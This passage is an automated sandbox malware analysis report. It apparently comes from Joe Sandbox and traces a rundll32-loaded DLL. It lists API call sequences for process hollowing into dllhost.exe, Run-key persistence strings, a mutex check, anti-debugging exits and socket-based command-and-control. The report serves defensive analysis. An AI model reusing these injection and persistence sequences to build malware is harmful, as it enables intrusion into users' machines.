                      • Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4EC3
                      • Part of subcall function 032A4E40: wsprintfA.USER32 ref: 032A4EDB
                    • gethostname.WS2_32(?,00000032), ref: 032A3DE3
                    • _strncpy.LIBCMT ref: 032A3DEF
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: _memset$ComputerName_strncpygethostnamelstrcpywsprintf
                    • String ID: Remark
                    • API String ID: 3464725772-3865500943
                    • Opcode ID: 6fcc0e234f97b244d1ec8f4c1d589cc0020035d61e0479ca81d3b138cdb01294
                    • Instruction ID: 966f1127cffbec293bf2b5bbe860a1004a3ad3eaafd6c00ea9d0e5ac2cb9ca70
                    • Opcode Fuzzy Hash: 6fcc0e234f97b244d1ec8f4c1d589cc0020035d61e0479ca81d3b138cdb01294
                    • Instruction Fuzzy Hash: 85E0261AA50A08278901E52C7C068B6BF1DC747668B0402EDEE080B201DE43084542D2
                    APIs
                    • __getptd_noexit.LIBCMT ref: 03298435
                      • Part of subcall function 0329445F: GetLastError.KERNEL32(00000001,00000000,032959B8,032936D7,00000000,?,0329722C,00000000,00000001,00000000,?,0329A203,00000018,032AC6D0,0000000C,0329A293), ref: 03294463
                      • Part of subcall function 0329445F: ___set_flsgetvalue.LIBCMT ref: 03294471
                      • Part of subcall function 0329445F: __calloc_crt.LIBCMT ref: 03294485
                      • Part of subcall function 0329445F: DecodePointer.KERNEL32(00000000,?,0329722C,00000000,00000001,00000000,?,0329A203,00000018,032AC6D0,0000000C,0329A293,00000000,00000000,?,03294583), ref: 0329449F
                      • Part of subcall function 0329445F: GetCurrentThreadId.KERNEL32 ref: 032944B5
                      • Part of subcall function 0329445F: SetLastError.KERNEL32(00000000,?,0329722C,00000000,00000001,00000000,?,0329A203,00000018,032AC6D0,0000000C,0329A293,00000000,00000000,?,03294583), ref: 032944CD
                    • __malloc_crt.LIBCMT ref: 03298457
                      • Part of subcall function 032959B3: __getptd_noexit.LIBCMT ref: 032959B3
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: ErrorLast__getptd_noexit$CurrentDecodePointerThread___set_flsgetvalue__calloc_crt__malloc_crt
                    • String ID: Time
                    • API String ID: 2454516118-3483776891
                    • Opcode ID: 20d0ed15f4cd0caf30daae80c2a2c2759bb554301a881009a841640b34dc1732
                    • Instruction ID: 281e2f2a7a29ab8a5fccbe4898d20998a34e68d9d98c5b56621e423102677ec5
                    • Opcode Fuzzy Hash: 20d0ed15f4cd0caf30daae80c2a2c2759bb554301a881009a841640b34dc1732
                    • Instruction Fuzzy Hash: 04E01232925B32CEFF72F738B50475A62E49F41720F09145BE6688F180DBB4D8C186D1

                    Execution Graph

                    Execution Coverage:0.8%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:244
                    Total number of Limit Nodes:7
                    execution_graph 24976 4175a10 CreateEventA GetTickCount _memset _strncpy 24987 4173690 20 API calls 25009 4173790 102 API calls __localtime64 24988 4164691 TlsAlloc 24989 4175a90 94 API calls 5 library calls 24990 4178290 76 API calls __cinit 24998 416171b RaiseException ctype __CxxThrowException@8 24965 4174598 230 API calls 3 library calls 24966 4172185 71 API calls ___InternalCxxFrameHandler 24931 4161000 VirtualFree ctype 24932 4172000 LocalFree 24943 4175880 Sleep CloseHandle 24991 4175e80 107 API calls ___DllMainCRTStartup 25000 4176b00 170 API calls 4 library calls 25010 4173f80 21 API calls 2 library calls 25011 4173780 GetSystemTimeAsFileTime __time64 24944 4164c8f 107 API calls 3 library calls 24979 416f20a CloseHandle 24658 4160009 24661 41ae000 24658->24661 24668 41ae216 24661->24668 24663 41ae00f 24664 4160015 24663->24664 24665 41ae0c7 24663->24665 24671 41ae14d 24663->24671 24665->24664 24675 4163f46 24665->24675 24681 41ae3ad GetPEB 24668->24681 24670 41ae222 24670->24663 24674 41ae16a 24671->24674 24672 41ae15d LoadLibraryA 24673 41ae1a0 24672->24673 24672->24674 24673->24665 24674->24672 24674->24673 24676 4163f56 24675->24676 24677 4163f51 24675->24677 24683 4163e50 24676->24683 24695 416a4bf GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 24677->24695 24680 4163f64 24680->24664 24682 41ae3c0 24681->24682 24682->24670 24684 4163e5c ___FrameUnwindToState 24683->24684 24685 4163ea9 24684->24685 24692 4163ef9 ___FrameUnwindToState 24684->24692 24696 4163cec 24684->24696 24685->24692 24748 4178060 24685->24748 24689 4163ed9 24690 4163cec __CRT_INIT@12 149 API calls 24689->24690 24689->24692 24690->24692 24691 4178060 ___DllMainCRTStartup 353 API calls 24693 4163ed0 24691->24693 24692->24680 24694 4163cec __CRT_INIT@12 149 API calls 24693->24694 24694->24689 24695->24676 24697 4163cf8 ___FrameUnwindToState 24696->24697 24698 4163d00 24697->24698 24699 4163d7a 24697->24699 24752 4167925 HeapCreate 24698->24752 24701 4163d80 24699->24701 24702 4163ddb 24699->24702 24708 4163d9e 24701->24708 24715 4163d09 ___FrameUnwindToState 24701->24715 24762 41678f8 66 API calls _doexit 24701->24762 24703 4163de0 24702->24703 24704 4163e39 24702->24704 24767 416469a TlsGetValue DecodePointer TlsSetValue 24703->24767 24704->24715 24771 4164981 79 API calls __freefls@4 24704->24771 24705 4163d05 24707 4163d10 24705->24707 24705->24715 24753 41649ef 86 API calls 4 library calls 24707->24753 24713 4163db2 24708->24713 24763 4166a59 67 API calls _free 24708->24763 24710 4163de5 24768 4167540 66 API calls __calloc_crt 24710->24768 24766 4163dc5 70 API calls __mtterm 24713->24766 24715->24685 24717 4163d15 __RTC_Initialize 24720 4163d19 24717->24720 24727 4163d25 GetCommandLineA 24717->24727 24719 4163df1 24719->24715 24722 4163dfd DecodePointer 24719->24722 24754 4167943 HeapDestroy 24720->24754 24721 4163da8 24764 41646ce 70 API calls _free 24721->24764 24728 4163e12 24722->24728 24725 4163d1e 24725->24715 24726 4163dad 24765 4167943 HeapDestroy 24726->24765 24755 416a272 71 API calls 2 library calls 24727->24755 24732 4163e16 24728->24732 24733 4163e2d 24728->24733 24731 4163d35 24756 4166814 73 API calls __calloc_crt 24731->24756 24769 416470b 66 API calls 4 library calls 24732->24769 24770 416364a 66 API calls 2 library calls 24733->24770 24737 4163d3f 24739 4163d43 24737->24739 24758 416a1b7 95 API calls 3 library calls 24737->24758 24738 4163e1d GetCurrentThreadId 24738->24715 24757 41646ce 70 API calls _free 24739->24757 24742 4163d4f 24743 4163d63 24742->24743 24759 4169f41 94 API calls 6 library calls 24742->24759 24743->24725 24761 4166a59 67 API calls _free 24743->24761 24746 4163d58 24746->24743 24760 416770b 77 API calls 4 library calls 24746->24760 24749 4163ebc 24748->24749 24750 4178069 DisableThreadLibraryCalls 24748->24750 24749->24689 24749->24691 24772 41748a0 24750->24772 24752->24705 24753->24717 24754->24725 24755->24731 24756->24737 24757->24720 24758->24742 24759->24746 24760->24743 24761->24739 24762->24708 24763->24721 24764->24726 24765->24713 24766->24715 24767->24710 24768->24719 24769->24738 24770->24725 24771->24715 24817 4175140 24772->24817 24776 41748cb 24777 41748e5 24776->24777 24778 41748d2 OutputDebugStringA ExitProcess 24776->24778 24837 4162103 24777->24837 24781 417491b _memset 24849 41637f2 24781->24849 24786 417496d 24788 417497d 24786->24788 24789 41749cd 24786->24789 24787 41639f6 ___DllMainCRTStartup 85 API calls 24787->24786 24875 4174b70 9 API calls ___DllMainCRTStartup 24788->24875 24791 4175140 ___DllMainCRTStartup 20 API calls 24789->24791 24793 41749d7 lstrlenA 24791->24793 24792 41749ca 24792->24789 24794 4174a54 CreateMutexA GetLastError 24793->24794 24795 41749e2 24793->24795 24796 4174a77 24794->24796 24797 4174a6f ExitProcess 24794->24797 24876 41627aa GetSystemTimeAsFileTime __aulldiv 24795->24876 24879 4173e10 95 API calls ___DllMainCRTStartup 24796->24879 24800 41749ee 24877 4163cc5 102 API calls __localtime64_s 24800->24877 24801 4174a7c 24880 4176880 175 API calls 5 library calls 24801->24880 24804 41749fa _memset 24807 4174a14 wsprintfA 24804->24807 24805 4174a84 24806 4174a87 CreateThread WaitForSingleObject CloseHandle 24805->24806 24809 4175140 ___DllMainCRTStartup 20 API calls 24806->24809 24929 4174520 235 API calls 4 library calls 24806->24929 24878 4175070 18 API calls 3 library calls 24807->24878 24815 4174ab3 24809->24815 24810 4174b2d ctype 24811 4174b3a CoUninitialize 24810->24811 24882 41621eb 24811->24882 24813 4174b4d 24813->24749 24815->24810 24815->24815 24816 4174b0c wsprintfA 24815->24816 24881 4173c90 69 API calls 3 library calls 24815->24881 24816->24806 24816->24810 24818 4175164 _memset 24817->24818 24819 417517e GetComputerNameA 24818->24819 24820 41751b5 _memset 24819->24820 24821 41751a3 lstrcpyA 24819->24821 24822 41751c8 wsprintfA 24820->24822 24821->24820 24823 4174d60 ___DllMainCRTStartup 17 API calls 24822->24823 24824 41751fe 24823->24824 24825 41621eb __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 24824->24825 24826 41748c0 24825->24826 24827 41639f6 24826->24827 24829 4163a05 24827->24829 24831 4163a26 24827->24831 24830 4163a0a 24829->24830 24829->24831 24890 4165c8c 66 API calls __getptd_noexit 24830->24890 24892 4163936 85 API calls 4 library calls 24831->24892 24832 4163a38 24832->24776 24834 4163a0f 24891 4165c3a 11 API calls __cftog_l 24834->24891 24836 4163a1a 24836->24776 24839 41629fe 24837->24839 24840 4162a22 GetModuleFileNameA 24839->24840 24843 4162a24 std::exception::exception 24839->24843 24893 416375e 24839->24893 24911 4165fca DecodePointer 24839->24911 24840->24781 24847 4162a62 24843->24847 24912 41634d7 76 API calls __cinit 24843->24912 24844 4162a6c 24914 4163f69 RaiseException 24844->24914 24913 41629d9 66 API calls std::exception::operator= 24847->24913 24848 4162a7d 24850 4163825 24849->24850 24851 4163810 24849->24851 24850->24851 24853 416382c 24850->24853 24923 4165c8c 66 API calls __getptd_noexit 24851->24923 24925 4164f04 102 API calls 12 library calls 24853->24925 24854 4163815 24924 4165c3a 11 API calls __cftog_l 24854->24924 24857 4163852 24858 4163820 24857->24858 24926 4167b65 97 API calls 6 library calls 24857->24926 24860 4174d60 24858->24860 24861 4174dcb _memset 24860->24861 24862 4174df1 7 API calls 24861->24862 24863 4174e85 24862->24863 24866 4174e76 ___DllMainCRTStartup 24862->24866 24864 4174f67 24863->24864 24865 4174e99 RegQueryValueExA 24863->24865 24863->24866 24874 4174ee6 __mbschr_l ___DllMainCRTStartup 24863->24874 24864->24866 24871 4174fd8 wsprintfA 24864->24871 24865->24866 24867 4174ecd lstrcpyA 24865->24867 24868 4175002 FreeLibrary 24866->24868 24869 4175009 24866->24869 24867->24866 24868->24869 24870 41621eb __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 24869->24870 24872 4174966 24870->24872 24871->24866 24872->24786 24872->24787 24873 4174f4e lstrcpyA 24873->24866 24874->24866 24874->24873 24875->24792 24876->24800 24877->24804 24878->24794 24879->24801 24880->24805 24927 4176200 149 API calls 5 library calls 24880->24927 24881->24815 24883 41621f5 IsDebuggerPresent 24882->24883 24884 41621f3 24882->24884 24928 416a55a 24883->24928 24884->24813 24887 4164082 SetUnhandledExceptionFilter UnhandledExceptionFilter 24888 41640a7 GetCurrentProcess TerminateProcess 24887->24888 24889 416409f __call_reportfault 24887->24889 24888->24813 24889->24888 24890->24834 24891->24836 24892->24832 24894 416376c 24893->24894 24895 41637db 24893->24895 24905 4163777 24894->24905 24921 4165fca DecodePointer 24895->24921 24897 41637e1 24922 4165c8c 66 API calls __getptd_noexit 24897->24922 24900 416379a HeapAlloc 24902 41637d3 24900->24902 24900->24905 24901 41637e7 24901->24839 24902->24901 24904 41637c7 24919 4165c8c 66 API calls __getptd_noexit 24904->24919 24905->24894 24905->24900 24905->24904 24909 41637c5 24905->24909 24915 4167b2c 66 API calls __NMSG_WRITE 24905->24915 24916 416797d 66 API calls 6 library calls 24905->24916 24917 416768a GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 24905->24917 24918 4165fca DecodePointer 24905->24918 24920 4165c8c 66 API calls __getptd_noexit 24909->24920 24911->24839 24912->24847 24913->24844 24914->24848 24915->24905 24916->24905 24918->24905 24919->24909 24920->24902 24921->24897 24922->24901 24923->24854 24924->24858 24925->24857 24926->24858 24928->24887 24992 416cab5 68 API calls 2 library calls 24993 416e2b3 85 API calls __forcdecpt_l 24980 4161630 77 API calls 2 library calls 24968 41641be IsProcessorFeaturePresent 24935 4178020 70 API calls _memcpy_s 24970 41735a0 CreateThread 25012 41737a0 GetLastInputInfo GetTickCount 24971 41831a3 __localtime64_s ___security_init_cookie ___DllMainCRTStartup 24936 4166450 5 API calls 2 library calls 24957 416c150 RtlUnwind 24937 4175850 GetTickCount 24950 41734d0 GetFileAttributesA 25014 41783d0 VariantClear 24938 4177059 11 API calls 2 library calls 24983 41725f2 69 API calls 2 library calls 24939 4161040 13 API calls ctype 24958 4165d40 6 API calls 3 library calls 25017 4161bc0 66 API calls std::exception::exception 25018 41757f3 CreateEventA 24984 416e27a 76 API calls __fassign_l 24974 41779e0 101 API calls 3 library calls 24975 41769e0 13 API calls 3 library calls 25007 4174b60 352 API calls ___DllMainCRTStartup 25019 41737e0 LoadLibraryA GetProcAddress GetProcAddress FreeLibrary 24940 416346a 67 API calls __calloc_crt

                    Control-flow Graph

                    APIs
                      • Part of subcall function 04175140: _memset.LIBCMT ref: 0417515F
                      • Part of subcall function 04175140: _memset.LIBCMT ref: 04175179
                      • Part of subcall function 04175140: GetComputerNameA.KERNEL32(00000000,?), ref: 04175199
                      • Part of subcall function 04175140: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 041751AF
                      • Part of subcall function 04175140: _memset.LIBCMT ref: 041751C3
                      • Part of subcall function 04175140: wsprintfA.USER32 ref: 041751DB
                    • OutputDebugStringA.KERNEL32(Blocked,?,?), ref: 041748D7
                    • ExitProcess.KERNEL32 ref: 041748DF
                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,?), ref: 041748FD
                    • _memset.LIBCMT ref: 04174916
                    • _memset.LIBCMT ref: 0417492E
                    • _sprintf.LIBCMT ref: 04174940
                    • lstrlenA.KERNEL32(00000000), ref: 041749D8
                    • __time64.LIBCMT ref: 041749E9
                    • __localtime64.LIBCMT ref: 041749F5
                    • _memset.LIBCMT ref: 04174A0F
                    • wsprintfA.USER32 ref: 04174A3B
                    • CreateMutexA.KERNELBASE(00000000,00000001,xYYAgXEhxx), ref: 04174A5C
                    • GetLastError.KERNEL32 ref: 04174A62
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: _memset$Namewsprintf$ComputerCreateDebugErrorExitFileLastModuleMutexOutputProcessString__localtime64__time64_sprintflstrcpylstrlen
                    • String ID: "%s"$%d-%d-%d %d:%d$Blocked$CopyC$Enable$False$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Time$rolyer.update$xYYAgXEhxx
                    • API String ID: 258807487-782532684
                    • Opcode ID: 70333dd6b92dfd6e4b180865ec4faa0bba63af259d0125d3a4e950335540887f
                    • Instruction ID: 322d4f2bcebb4b07808ff5353e900e2fb0e5becac193a4ace0cbc5e86fe47744
                    • Opcode Fuzzy Hash: 70333dd6b92dfd6e4b180865ec4faa0bba63af259d0125d3a4e950335540887f
                    • Instruction Fuzzy Hash: 54610AF1944214ABE710EB60DCC4FEA777CEB04308F044598FA66A7141EB78BE88CB65

                    Control-flow Graph

                    APIs
                    • _memset.LIBCMT ref: 04174DC6
                    • _memset.LIBCMT ref: 04174DD9
                    • _memset.LIBCMT ref: 04174DEC
                    • LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,161FA605,?,Enable,?), ref: 04174DF9
                    • GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 04174E13
                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 04174E21
                    • GetProcAddress.KERNEL32(00000000,RegEnumValueA), ref: 04174E2F
                    • GetProcAddress.KERNEL32(00000000,RegEnumKeyExA), ref: 04174E37
                    • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 04174E3F
                    • RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,?,?,?,?,?,161FA605,?,Enable,?), ref: 04174E6C
                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,161FA605,?,Enable,?), ref: 04175003
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$_memset$Library$FreeLoadOpen
                    • String ID: %08X$ADVAPI32.dll$Enable$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA
                    • API String ID: 1822379937-990719231
                    • Opcode ID: 6960c7bac29a4abd73a9fd5ddc1baa21283c16ef544b9b8d33ba16020c793edf
                    • Instruction ID: 88bb7691feac22eae931b75c124b4ec8f1d08a79185006e13bdae0c6d5b52fe9
                    • Opcode Fuzzy Hash: 6960c7bac29a4abd73a9fd5ddc1baa21283c16ef544b9b8d33ba16020c793edf
                    • Instruction Fuzzy Hash: FC711AB1A44228ABDB24DF55CCC9FAEB7BCFB48704F004199F519A6180DB74BA84CF51

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: _memset$ComputerNamelstrcpywsprintf
                    • String ID: 2024-12-19 8:48$Enable$SOFTWARE\%s\$UnKnow
                    • API String ID: 1685617284-1412731634
                    • Opcode ID: dd3cd0f605edd863eb4ed0221a371795323f05c37a306f8cb5abbf71a6cad542
                    • Instruction ID: 30d3fd24544ed88c434b160afd7aed9a919a8770453dead5611a2d57804811d5
                    • Opcode Fuzzy Hash: dd3cd0f605edd863eb4ed0221a371795323f05c37a306f8cb5abbf71a6cad542
                    • Instruction Fuzzy Hash: 381194B5A903086BF720EB54CC89FDA7379EB44708F4044D9B715760C0EB75BB948B54

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 118 41ae14d-41ae15b 119 41ae199-41ae19e 118->119 120 41ae15d-41ae168 LoadLibraryA 119->120 121 41ae1a0-41ae1a2 119->121 123 41ae1aa-41ae1ac 120->123 124 41ae16a-41ae16f 120->124 122 41ae1a5-41ae1a9 121->122 123->122 125 41ae190-41ae194 124->125 126 41ae171 125->126 127 41ae196 125->127 128 41ae178-41ae17b 126->128 129 41ae173-41ae176 126->129 127->119 130 41ae17d-41ae17f 128->130 129->130 130->123 131 41ae181-41ae189 130->131 131->123 133 41ae18b-41ae18d 131->133 133->125
                    APIs
                    • LoadLibraryA.KERNELBASE(0000C087,?,?,?,00000000,041AE0C7,?,?,?,?,?), ref: 041AE160
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.00000000041AE000.00000040.00001000.00020000.00000000.sdmp, Offset: 041AE000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_41ae000_rundll32.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
                    • Instruction ID: 65f0a3b74819d763773ab95d7896e0c13cd4884105b131fbe6c6a0eb78bf1b2b
                    • Opcode Fuzzy Hash: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
                    • Instruction Fuzzy Hash: B3F0FFBA7843328FEB148E54CCD897777E8EE81265B0A0868E842C7201F321F82087A0

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 134 4178060-4178067 135 4178080-4178086 134->135 136 4178069-417807a DisableThreadLibraryCalls call 41748a0 134->136 138 417807f 136->138 138->135
                    APIs
                    • DisableThreadLibraryCalls.KERNEL32(?,?,?,04163EBC,?,?,?,?,?,?,0417C538,0000000C,04163F64,?), ref: 0417806E
                      • Part of subcall function 041748A0: OutputDebugStringA.KERNEL32(Blocked,?,?), ref: 041748D7
                      • Part of subcall function 041748A0: ExitProcess.KERNEL32 ref: 041748DF
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: CallsDebugDisableExitLibraryOutputProcessStringThread
                    • String ID:
                    • API String ID: 825726465-0
                    • Opcode ID: e723a52c15416d8b6df7d1eba17e888434024f1899093f9fc271e35085d775eb
                    • Instruction ID: abb00065241bd037983d17f5349ea2c25ff08f6db99eba972b4e40609d08cd50
                    • Opcode Fuzzy Hash: e723a52c15416d8b6df7d1eba17e888434024f1899093f9fc271e35085d775eb
                    • Instruction Fuzzy Hash: 1BD0C97256152897DB10AF59A484ACA37BCEB19750F004016F9249B200C7B9FAD187E9

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 139 4167925-4167942 HeapCreate
                    APIs
                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,000000FF,?,0416B0DF,00000011,00000000,?,041648E3,0000000D,0417C5A0,00000008,041649DA,00000000), ref: 0416792E
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: CreateHeap
                    • String ID:
                    • API String ID: 10892065-0
                    • Opcode ID: 624f8894d4783e5265dc1a03ccdb2783a84640135c37cae814d34913ba00737f
                    • Instruction ID: e285c6fe1bf1a9ac15deb848d24382757a514cf5a49cea9cf68ca777f8962855
                    • Opcode Fuzzy Hash: 624f8894d4783e5265dc1a03ccdb2783a84640135c37cae814d34913ba00737f
                    • Instruction Fuzzy Hash: 67C09BB074130257F75447355C5AB4525D4D718752F210039B117D95C0DBA498E05604
                    APIs
                    • _memset.LIBCMT ref: 0416201E
                    • CreateProcessA.KERNEL32(00000000,dllhost.exe,00000000,00000000,00000000,00000044,00000000,00000000,?,?), ref: 04162051
                    • GetThreadContext.KERNEL32(?,?), ref: 04162078
                    • VirtualAllocEx.KERNEL32(?,00000000,00027400,00001000,00000040), ref: 04162093
                    • WriteProcessMemory.KERNEL32(?,00000000,MZER,00027400,00000000), ref: 041620AF
                    • SetThreadContext.KERNEL32(?,00010003), ref: 041620C9
                    • ResumeThread.KERNEL32(?), ref: 041620D6
                    • CloseHandle.KERNEL32(?), ref: 041620E9
                    • CloseHandle.KERNEL32(?), ref: 041620F2
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: Thread$CloseContextHandleProcess$AllocCreateMemoryResumeVirtualWrite_memset
                    • String ID: D$MZER$dllhost.exe
                    • API String ID: 4271913790-2395381201
                    • Opcode ID: a56f9088d4158cf9f3e5f50221940886a15c51d99b620523f94ec468062c5208
                    • Instruction ID: a0b88788f6f9e3bf6e3eb6abf1361a30f263032625af4ca05c1a2f87e37b7f6b
                    • Opcode Fuzzy Hash: a56f9088d4158cf9f3e5f50221940886a15c51d99b620523f94ec468062c5208
                    • Instruction Fuzzy Hash: F0212FB1A90218ABEB209B64DC89F9A7778EB48744F1041C9B709B6180D7B4AE85CF54

                    Control-flow Graph

                    APIs
                      • Part of subcall function 04177460: WSAStartup.WS2_32(00000202,?), ref: 041774B1
                      • Part of subcall function 04177460: InitializeCriticalSection.KERNEL32(?), ref: 041774BE
                      • Part of subcall function 04177460: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 041774C9
                      • Part of subcall function 04177460: __time64.LIBCMT ref: 041774EC
                    • GetTickCount.KERNEL32 ref: 04174586
                      • Part of subcall function 04177B90: ResetEvent.KERNEL32(?,762323A0,?,?), ref: 04177BB3
                      • Part of subcall function 04177B90: socket.WS2_32 ref: 04177BC6
                    • Sleep.KERNEL32(0000EA60,00000000), ref: 041745C5
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 041745FE
                    • _memset.LIBCMT ref: 04174629
                    • _strncpy.LIBCMT ref: 0417463F
                    • GetTickCount.KERNEL32 ref: 04174664
                    • GetTickCount.KERNEL32 ref: 04174675
                    • setsockopt.WS2_32 ref: 041746B1
                    • CancelIo.KERNEL32(?), ref: 041746BF
                    • InterlockedExchange.KERNEL32(?,00000000), ref: 041746CF
                    • closesocket.WS2_32(?), ref: 041746DD
                    • SetEvent.KERNEL32(?), ref: 041746EB
                    • Sleep.KERNEL32 ref: 04174707
                    • Sleep.KERNEL32(00000BB8), ref: 04174721
                    • CloseHandle.KERNEL32(?), ref: 0417473A
                    • GetTickCount.KERNEL32 ref: 0417485C
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: CountEventTick$Sleep$Create$CancelCloseCriticalExchangeHandleInitializeInterlockedResetSectionStartup__time64_memset_strncpyclosesocketsetsockoptsocket
                    • String ID:
                    • API String ID: 2471061221-0
                    • Opcode ID: f316e47a7cd7b5434b48bdd1c7c8bf58c282fba33316628d9d8697641c9966a7
                    • Instruction ID: 0f9cbf6b437b20c49a3b8f9abf249d7b8ace4460a02f5a835d6738d112a3e19c
                    • Opcode Fuzzy Hash: f316e47a7cd7b5434b48bdd1c7c8bf58c282fba33316628d9d8697641c9966a7
                    • Instruction Fuzzy Hash: 1A817AB15583809BE324DF65D8C4BDBB7F4EB88708F00491DE69997280DB38A949CB92
                    APIs
                    • LoadLibraryA.KERNEL32(?,?,00000000,00000000,00000000), ref: 041738A8
                    • GetProcAddress.KERNEL32(00000000), ref: 041738B1
